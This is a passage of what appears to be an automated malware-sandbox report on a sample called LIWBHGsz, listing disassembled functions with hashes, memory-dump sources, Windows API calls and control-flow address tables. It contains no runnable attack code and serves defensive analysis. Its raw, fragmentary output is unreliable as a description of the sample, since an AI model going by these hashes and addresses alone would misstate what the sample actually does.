                                                                                                                                  • Instruction ID: 8c19cf39a71b0f90d8a5681f5c405a6aab6a680e65cb5e9ced0ea355264d23a7
                                                                                                                                  • Opcode Fuzzy Hash: 9b149557d136fed973e3969358a78099a5e919381c152c4b3ba6a00eaeb7b50e
                                                                                                                                  • Instruction Fuzzy Hash: F41134729002499FCB10DFAAC945BEFBFF5EF88324F208819E559A7250C775A944CFA0
                                                                                                                                  Function 086AFE30 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ResumeThread.KERNELBASE(00000009), ref: 086AFE9A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1883398187.00000000086A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_86a0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: 43bf883aaf4943a82ffd6d2704ea255a1a5762cc11282b132f65be8897cbe68f
                                                                                                                                  • Instruction ID: 85ff576872bfd97034054afda02f3b099b3aea737117fcdccb422752ea82be72
                                                                                                                                  • Opcode Fuzzy Hash: 43bf883aaf4943a82ffd6d2704ea255a1a5762cc11282b132f65be8897cbe68f
                                                                                                                                  • Instruction Fuzzy Hash: 02115BB19003498FCB10DFAAD4457EEFBF5AB88324F208819D459A7251CB35A944CFA5
                                                                                                                                  Function 086AFE38 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ResumeThread.KERNELBASE(00000009), ref: 086AFE9A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1883398187.00000000086A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_86a0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: acc3f4fa53cd877999e50d70919c3d639932dfef4937330ec2d1b89f3afe0ba9
                                                                                                                                  • Instruction ID: 1f26c11c684d71c6422367af7bf28f275ef283ab828dd46d5253cca745b629a4
                                                                                                                                  • Opcode Fuzzy Hash: acc3f4fa53cd877999e50d70919c3d639932dfef4937330ec2d1b89f3afe0ba9
                                                                                                                                  • Instruction Fuzzy Hash: 39116AB1D003488FCB10DFAAC4447EEFBF4EB88320F208819C459A7250CB34A944CFA4
                                                                                                                                  Function 02E63D68 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 02E63DCD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                  • Opcode ID: 1ebddd2d2acb2334fb006386cd288fa0638082fffa8542402f9354291ba97db9
                                                                                                                                  • Instruction ID: 4a551a282388e37479ca4d6ca258ade9f4e48e518926ab5dfe7544263eeb078d
                                                                                                                                  • Opcode Fuzzy Hash: 1ebddd2d2acb2334fb006386cd288fa0638082fffa8542402f9354291ba97db9
                                                                                                                                  • Instruction Fuzzy Hash: B611F2B6800249CFDB10DF99D989BEEBFF8EB49314F10845AE559A7210C379A584CFA0
                                                                                                                                  Function 02E63D70 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 02E63DCD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                  • Opcode ID: b898c1c3f9c158a5b7ceb3085dc32ee3a9aa69fed39ad35f8c74ac328c459f29
                                                                                                                                  • Instruction ID: 63b849c829c8fc61f745675eaffcae5ac68b73ff9a827b0b86a572120aae084f
                                                                                                                                  • Opcode Fuzzy Hash: b898c1c3f9c158a5b7ceb3085dc32ee3a9aa69fed39ad35f8c74ac328c459f29
                                                                                                                                  • Instruction Fuzzy Hash: 9B1103B58003489FCB10DF9AD989BDEBBF8EB48324F10845AE559A7210C375A544CFA1
                                                                                                                                  Function 0150D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1874119269.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_150d000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e2ac60ce7ce078914573dd69aeb64595cd7bd5edc5bc1918a5c420f8993a6690
                                                                                                                                  • Instruction ID: 779353659703679729aef92d6471734af191288d2db5ca2db999c4f3ad635138
                                                                                                                                  • Opcode Fuzzy Hash: e2ac60ce7ce078914573dd69aeb64595cd7bd5edc5bc1918a5c420f8993a6690
                                                                                                                                  • Instruction Fuzzy Hash: AC214871100200DFDB02DFC8C9C0B6ABFB5FB84324F20C569E9090F296C376E446C6A2
                                                                                                                                  Function 0150D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1874119269.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_150d000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d32f767978c4360eed8ab87c4acb4ed57dd1fca74fce8189309993daa47adadc
                                                                                                                                  • Instruction ID: 64afad6fb5df651e16be02c71bee94445d10ca4536b3b981404d1b9d0ee026b2
                                                                                                                                  • Opcode Fuzzy Hash: d32f767978c4360eed8ab87c4acb4ed57dd1fca74fce8189309993daa47adadc
                                                                                                                                  • Instruction Fuzzy Hash: 3A21BD71504240DFDB06DFD8D980B2ABFB5FB88318F24C569ED094E296C336D456CAA2
                                                                                                                                  Function 0151D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1874208658.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_151d000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 21f581554570de0471ef01195e76dfd5a31c0a297c456b717d97a81dcdaa8ef3
                                                                                                                                  • Instruction ID: 1bd78b09d19514bdd2843e8faf18d8df5f2af7d5b26cb8079fe6aa19348a6937
                                                                                                                                  • Opcode Fuzzy Hash: 21f581554570de0471ef01195e76dfd5a31c0a297c456b717d97a81dcdaa8ef3
                                                                                                                                  • Instruction Fuzzy Hash: 2C210075604200DFEB16DF58D988B2ABBB5FB84314F20C96DD80A4F25AD33AD846CA61
                                                                                                                                  Function 0151D39C Relevance: .1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1874208658.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_151d000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dae64c2e5d0df206a3be6e67e77eeefaa4e29d4893277a70763c5e1f072d7c21
                                                                                                                                  • Instruction ID: cac7f7a5f1b80823ddb78b2344014048ebecc4826160e4007edd03b482824216
                                                                                                                                  • Opcode Fuzzy Hash: dae64c2e5d0df206a3be6e67e77eeefaa4e29d4893277a70763c5e1f072d7c21
                                                                                                                                  • Instruction Fuzzy Hash: FE214975540200DFEB02DF58D5C8B2ABFB5FB84314F20C96DD9094F29AC3BAE446CA61
                                                                                                                                  Function 0151D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1874208658.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_151d000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 822f00769bec24d554850ac28a69ab65d997d6e6418a2b1116f267c136e86994
                                                                                                                                  • Instruction ID: ba957e1f3ee2e0b2619052d3bc78724892f7dfb11fb109b3d0f622edb7b259e4
                                                                                                                                  • Opcode Fuzzy Hash: 822f00769bec24d554850ac28a69ab65d997d6e6418a2b1116f267c136e86994
                                                                                                                                  • Instruction Fuzzy Hash: 67219F755093808FDB03CF24D994B15BF71FB46214F28C5EAD8498F2A7C33A984ACB62
                                                                                                                                  Function 0150D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1874119269.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_150d000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                  • Instruction ID: 3da0e26c2be68106e1f42d4e329715da3c2b89e88262f60e298d1f010beb1cba
                                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                  • Instruction Fuzzy Hash: 0811DF72404240CFDB02CF84D5C4B5ABF71FB94324F24C2A9D9090F256C33AE45ACBA1
                                                                                                                                  Function 0150D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1874119269.000000000150D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0150D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_150d000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                  • Instruction ID: 56788db494a8cfcca4faddb85ecd648d2dde0e798e8478e01f963262c16fc2be
                                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                  • Instruction Fuzzy Hash: 1F119D76504280CFDB16CF94D5C4B1ABF71FB88218F24C6A9DD490F696C33AD45ACBA1
                                                                                                                                  Function 0151D397 Relevance: .1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1874208658.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_151d000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction ID: 8771325a1a6c76f63740dee260c059c1cc7ec9f6e32a252996170a0e793e4381
                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction Fuzzy Hash: 5D11BE75544280DFDB02CF58D5C8B59BF71FB84214F24C6A9D8494F256C3BAE44ACB51

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:11.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:39
                                                                                                                                  Total number of Limit Nodes:6
                                                                                                                                  execution_graph 24324 3090848 24326 309084e 24324->24326 24325 309091b 24326->24325 24328 3091380 24326->24328 24330 3091396 24328->24330 24329 3091484 24329->24326 24330->24329 24332 3097ea8 24330->24332 24333 3097eb2 24332->24333 24334 3097ecc 24333->24334 24337 6cefa98 24333->24337 24342 6cefa88 24333->24342 24334->24330 24338 6cefaad 24337->24338 24339 6cefcc2 24338->24339 24340 6ceff2b GlobalMemoryStatusEx 24338->24340 24341 6cefcd9 GlobalMemoryStatusEx 24338->24341 24339->24334 24340->24338 24341->24338 24346 6cefa98 24342->24346 24343 6cefcc2 24343->24334 24344 6ceff2b GlobalMemoryStatusEx 24344->24346 24345 6cefcd9 GlobalMemoryStatusEx 24345->24346 24346->24343 24346->24344 24346->24345 24347 309fef8 24348 309ff20 24347->24348 24349 309ff90 24348->24349 24351 6ceff2b 24348->24351 24353 6ceff42 24351->24353 24354 6cefd09 24351->24354 24352 6cefd66 24352->24349 24353->24349 24354->24352 24358 309e708 24354->24358 24361 309e6f8 24354->24361 24355 6cefe3f 24355->24349 24365 309eb30 24358->24365 24359 309e716 24359->24355 24362 309e708 24361->24362 24364 309eb30 GlobalMemoryStatusEx 24362->24364 24363 309e716 24363->24355 24364->24363 24366 309eb4d 24365->24366 24368 309eb75 24365->24368 24366->24359 24367 309eb96 24367->24359 24368->24367 24369 309ec5e GlobalMemoryStatusEx 24368->24369 24370 309ec8e 24369->24370 24370->24359

                                                                                                                                  Executed Functions

                                                                                                                                  Function 06CE30E0 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 6ce30e0-6ce3101 1 6ce3103-6ce3106 0->1 2 6ce312c-6ce312f 1->2 3 6ce3108-6ce3127 1->3 4 6ce3135-6ce3154 2->4 5 6ce38d0-6ce38d2 2->5 3->2 13 6ce316d-6ce3177 4->13 14 6ce3156-6ce3159 4->14 7 6ce38d9-6ce38dc 5->7 8 6ce38d4 5->8 7->1 9 6ce38e2-6ce38eb 7->9 8->7 17 6ce317d-6ce318c 13->17 14->13 15 6ce315b-6ce316b 14->15 15->17 126 6ce318e call 6ce38f8 17->126 127 6ce318e call 6ce3900 17->127 19 6ce3193-6ce3198 20 6ce319a-6ce31a0 19->20 21 6ce31a5-6ce3482 19->21 20->9 42 6ce3488-6ce3537 21->42 43 6ce38c2-6ce38cf 21->43 52 6ce3539-6ce355e 42->52 53 6ce3560 42->53 55 6ce3569-6ce357c 52->55 53->55 57 6ce38a9-6ce38b5 55->57 58 6ce3582-6ce35a4 55->58 57->42 59 6ce38bb 57->59 58->57 61 6ce35aa-6ce35b4 58->61 59->43 61->57 62 6ce35ba-6ce35c5 61->62 62->57 63 6ce35cb-6ce36a1 62->63 75 6ce36af-6ce36df 63->75 76 6ce36a3-6ce36a5 63->76 80 6ce36ed-6ce36f9 75->80 81 6ce36e1-6ce36e3 75->81 76->75 82 6ce36fb-6ce36ff 80->82 83 6ce3759-6ce375d 80->83 81->80 82->83 86 6ce3701-6ce372b 82->86 84 6ce389a-6ce38a3 83->84 85 6ce3763-6ce379f 83->85 84->57 84->63 97 6ce37ad-6ce37bb 85->97 98 6ce37a1-6ce37a3 85->98 93 6ce372d-6ce372f 86->93 94 6ce3739-6ce3756 86->94 93->94 94->83 100 6ce37bd-6ce37c8 97->100 101 6ce37d2-6ce37dd 97->101 98->97 100->101 104 6ce37ca 100->104 105 6ce37df-6ce37e5 101->105 106 6ce37f5-6ce3806 101->106 104->101 107 6ce37e9-6ce37eb 105->107 108 6ce37e7 105->108 110 6ce381e-6ce382a 106->110 111 6ce3808-6ce380e 106->111 107->106 108->106 115 6ce382c-6ce3832 110->115 116 6ce3842-6ce3893 110->116 112 6ce3812-6ce3814 111->112 113 6ce3810 111->113 112->110 113->110 117 6ce3836-6ce3838 115->117 118 6ce3834 115->118 116->84 117->116 118->116 126->19 127->19
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1342094364
                                                                                                                                  • Opcode ID: 5fad17fdd0390899952a221e50d31788e3e04456ccbfe02a502d840bdd09743c
                                                                                                                                  • Instruction ID: 3d8731af9faf5287ff707ad8131bbde83c42b392e637a6525f1a1709d7039e25
                                                                                                                                  • Opcode Fuzzy Hash: 5fad17fdd0390899952a221e50d31788e3e04456ccbfe02a502d840bdd09743c
                                                                                                                                  • Instruction Fuzzy Hash: 58322F31E10759CFDB14EF65D99459DB7B2FFC9300F20869AD409AB264EB30AD85CB90
                                                                                                                                  Function 06CE7DD8 Relevance: 3.0, Strings: 2, Instructions: 473COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1178 6ce7dd8-6ce7df6 1179 6ce7df8-6ce7dfb 1178->1179 1180 6ce7e1c-6ce7e1f 1179->1180 1181 6ce7dfd-6ce7e17 1179->1181 1182 6ce7e2c-6ce7e2f 1180->1182 1183 6ce7e21-6ce7e2b 1180->1183 1181->1180 1185 6ce7e46-6ce7e49 1182->1185 1186 6ce7e31-6ce7e3f 1182->1186 1187 6ce7e6c-6ce7e6e 1185->1187 1188 6ce7e4b-6ce7e67 1185->1188 1193 6ce7e7e-6ce7e94 1186->1193 1194 6ce7e41 1186->1194 1191 6ce7e75-6ce7e78 1187->1191 1192 6ce7e70 1187->1192 1188->1187 1191->1179 1191->1193 1192->1191 1198 6ce80af-6ce80b9 1193->1198 1199 6ce7e9a-6ce7ea3 1193->1199 1194->1185 1200 6ce80ba-6ce80c4 1199->1200 1201 6ce7ea9-6ce7ec6 1199->1201 1204 6ce80c6-6ce80ef 1200->1204 1205 6ce8115-6ce811b 1200->1205 1210 6ce809c-6ce80a9 1201->1210 1211 6ce7ecc-6ce7ef4 1201->1211 1207 6ce80f1-6ce80f4 1204->1207 1208 6ce811f-6ce8121 1205->1208 1209 6ce811d 1205->1209 1212 6ce80fa-6ce8106 1207->1212 1213 6ce81a7-6ce81aa 1207->1213 1214 6ce812b-6ce8132 1208->1214 1209->1214 1210->1198 1210->1199 1211->1210 1235 6ce7efa-6ce7f03 1211->1235 1221 6ce8111-6ce8113 1212->1221 1217 6ce83d6-6ce83d9 1213->1217 1218 6ce81b0-6ce81bf 1213->1218 1215 6ce8134-6ce8141 1214->1215 1216 6ce8143 1214->1216 1219 6ce8148-6ce814a 1215->1219 1216->1219 1222 6ce83fc-6ce83fe 1217->1222 1223 6ce83db-6ce83f7 1217->1223 1229 6ce81de-6ce8219 1218->1229 1230 6ce81c1-6ce81dc 1218->1230 1227 6ce814c-6ce814f 1219->1227 1228 6ce8161-6ce819a 1219->1228 1221->1205 1221->1214 1225 6ce8405-6ce8408 1222->1225 1226 6ce8400 1222->1226 1223->1222 1225->1207 1231 6ce840e-6ce8417 1225->1231 1226->1225 1227->1231 1228->1218 1256 6ce819c-6ce81a6 1228->1256 1241 6ce821f-6ce8230 1229->1241 1242 6ce83aa-6ce83c0 1229->1242 1230->1229 1235->1200 1238 6ce7f09-6ce7f25 1235->1238 1248 6ce808a-6ce8096 1238->1248 1249 6ce7f2b-6ce7f55 1238->1249 1251 6ce8236-6ce8253 1241->1251 1252 6ce8395-6ce83a4 1241->1252 1242->1217 1248->1210 1248->1235 1262 6ce7f5b-6ce7f83 1249->1262 1263 6ce8080-6ce8085 1249->1263 1251->1252 1260 6ce8259-6ce834f call 6ce65f8 1251->1260 1252->1241 1252->1242 1312 6ce835d 1260->1312 1313 6ce8351-6ce835b 1260->1313 1262->1263 1270 6ce7f89-6ce7fb7 1262->1270 1263->1248 1270->1263 1275 6ce7fbd-6ce7fc6 1270->1275 1275->1263 1277 6ce7fcc-6ce7ffe 1275->1277 1284 6ce8009-6ce8025 1277->1284 1285 6ce8000-6ce8004 1277->1285 1284->1248 1288 6ce8027-6ce807e call 6ce65f8 1284->1288 1285->1263 1287 6ce8006 1285->1287 1287->1284 1288->1248 1314 6ce8362-6ce8364 1312->1314 1313->1314 1314->1252 1315 6ce8366-6ce836b 1314->1315 1316 6ce836d-6ce8377 1315->1316 1317 6ce8379 1315->1317 1318 6ce837e-6ce8380 1316->1318 1317->1318 1318->1252 1319 6ce8382-6ce838e 1318->1319 1319->1252
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                  • API String ID: 0-3550614674
                                                                                                                                  • Opcode ID: 4304002d9b089e6f937beb96d86f12251cc4ed420f2e3d4c866b0e055c2c0254
                                                                                                                                  • Instruction ID: c5050a45c20bd6c57a1769210daabe11acebaf66eea17ec66f8c906bb6c2c0ba
                                                                                                                                  • Opcode Fuzzy Hash: 4304002d9b089e6f937beb96d86f12251cc4ed420f2e3d4c866b0e055c2c0254
                                                                                                                                  • Instruction Fuzzy Hash: 5102C030B012059FDB54DF69D594AAEB7F2FF84300F148929E5169B3A8DB35ED82CB90
                                                                                                                                  Function 06CE2408 Relevance: 1.0, Instructions: 1006COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 787d85255b8ef1ae16a6ab09d5a17ae08eb4ae368ae54aa0a9df4df8d47c12a8
                                                                                                                                  • Instruction ID: eed13da388462570b816d48fc3aaabc6380cb6f6528fc146b1bf2e000812258b
                                                                                                                                  • Opcode Fuzzy Hash: 787d85255b8ef1ae16a6ab09d5a17ae08eb4ae368ae54aa0a9df4df8d47c12a8
                                                                                                                                  • Instruction Fuzzy Hash: 7E925534E002448FDBA4DF68C584B5DBBF6FB45310F5484AAD44AAB365DB39EE85CB80
                                                                                                                                  Function 06CE6648 Relevance: .8, Instructions: 818COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 36ec93251bc325cd86b1ff4afb4077ab74e490f7ad869152e47b6ee0d8239073
                                                                                                                                  • Instruction ID: e25ee1e091df7d0e8da1af17543cda494e1aceeb5c46c64ec4603ffbfd2aaa4d
                                                                                                                                  • Opcode Fuzzy Hash: 36ec93251bc325cd86b1ff4afb4077ab74e490f7ad869152e47b6ee0d8239073
                                                                                                                                  • Instruction Fuzzy Hash: 58629D34B102058FDB54DB6AD584BADBBF2EB98310F248469E406DB394DB35EE85CB90
                                                                                                                                  Function 06CEC1E8 Relevance: .6, Instructions: 645COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 69260616ef153a1f5e290515a62ae8d7d5279cddfa226ee753896e5b4c594b03
                                                                                                                                  • Instruction ID: 9cce0af3224d39362138cf035762a8fe8a89386c7c54431434c5e95eae59061d
                                                                                                                                  • Opcode Fuzzy Hash: 69260616ef153a1f5e290515a62ae8d7d5279cddfa226ee753896e5b4c594b03
                                                                                                                                  • Instruction Fuzzy Hash: 18328030B002058FDF54DB69D994BAEBBB2FB88310F108529E515EB395DB38DD81CB90
                                                                                                                                  Function 06CE5628 Relevance: .6, Instructions: 594COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 39390b403d557549ff776144f8109e10c70d57442b9efa4e76b8c231b86bc0cf
                                                                                                                                  • Instruction ID: e90474186e75cae984df53defee758c27b3613daf75e167b6b55c415e41ba240
                                                                                                                                  • Opcode Fuzzy Hash: 39390b403d557549ff776144f8109e10c70d57442b9efa4e76b8c231b86bc0cf
                                                                                                                                  • Instruction Fuzzy Hash: 1B120275F002058FDB60DB64D9806AEB7B2FF84324F64842ED956DB394DA36ED81CB90
                                                                                                                                  Function 06CEB283 Relevance: .6, Instructions: 566COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6a2b80beee33cc10641aa5fa2b515d02685de73430fbe066826cfcb89218a766
                                                                                                                                  • Instruction ID: 99919221a574a017b85290fcd9000e11dcd9733bc7bdb6e51bb6a051f21e0ba0
                                                                                                                                  • Opcode Fuzzy Hash: 6a2b80beee33cc10641aa5fa2b515d02685de73430fbe066826cfcb89218a766
                                                                                                                                  • Instruction Fuzzy Hash: 70227E30E102098FDF64DB68D6807BEB7B6FB49310F24852AE405EB395DA35DD81CB91
                                                                                                                                  Function 06CEB6A0 Relevance: 8.0, Strings: 6, Instructions: 470COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
